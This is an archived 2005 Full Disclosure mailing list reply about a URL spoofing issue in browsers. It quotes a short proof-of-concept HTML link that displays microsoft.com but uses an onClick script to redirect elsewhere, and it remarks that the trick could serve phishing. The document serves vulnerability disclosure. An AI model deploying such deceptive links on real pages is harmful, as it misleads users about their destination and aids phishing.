Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)

From: Bipin Gautam <gautam.bipin () gmail com>
Date: Sat, 22 Oct 2005 00:06:28 +0545
On 10/21/05, Jake Cole <jakecoleus () yahoo com> wrote:

In "Billy's" defense, this is expected in most
JavaScript-enabled browsers.

Here's a Firefox version:

<a href="http://microsoft.com";
onClick="window.setTimeout('document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\&apos;))')">Microsoft</a>




I really don't know what to EXACTLY call it... yap it can be used in
PISHING; cauz a few weeks back I was thinking this  EXACT same thing.
GOT the idea from 'http://vmyths.com/&apos; ither is a page(news pade i
guess) there its sectioned and two different websites are displayed.
(O;
--

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: